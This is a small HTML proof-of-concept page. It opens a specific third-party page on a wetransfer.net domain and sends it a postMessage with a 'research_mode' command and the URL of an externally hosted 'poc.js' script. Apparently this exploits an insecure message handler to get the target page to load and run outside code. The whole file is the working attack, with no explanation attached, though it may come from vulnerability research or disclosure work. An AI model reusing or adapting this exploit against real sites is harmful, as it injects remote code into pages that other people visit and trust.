<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>postMessage demo with open window</title>
</head>
<body>
  <button id="send">Open Page and Send Message</button>

  <script>
    const url = "https://backgrounds.wetransfer.net/genie/wepresent/2601/intro-asap-rocky/1_MVUaL7/index.html"; 
    let popup;


    document.getElementById("send").addEventListener("click", () => {
      popup = window.open(url);
      setTimeout(() => {
        popup.postMessage(JSON.stringify({
                command: "research_mode",
                data: ["https://daemoon.me/poc.js"]
                }), "*");
      }, 1000);
    });
  </script>
</body>
</html>
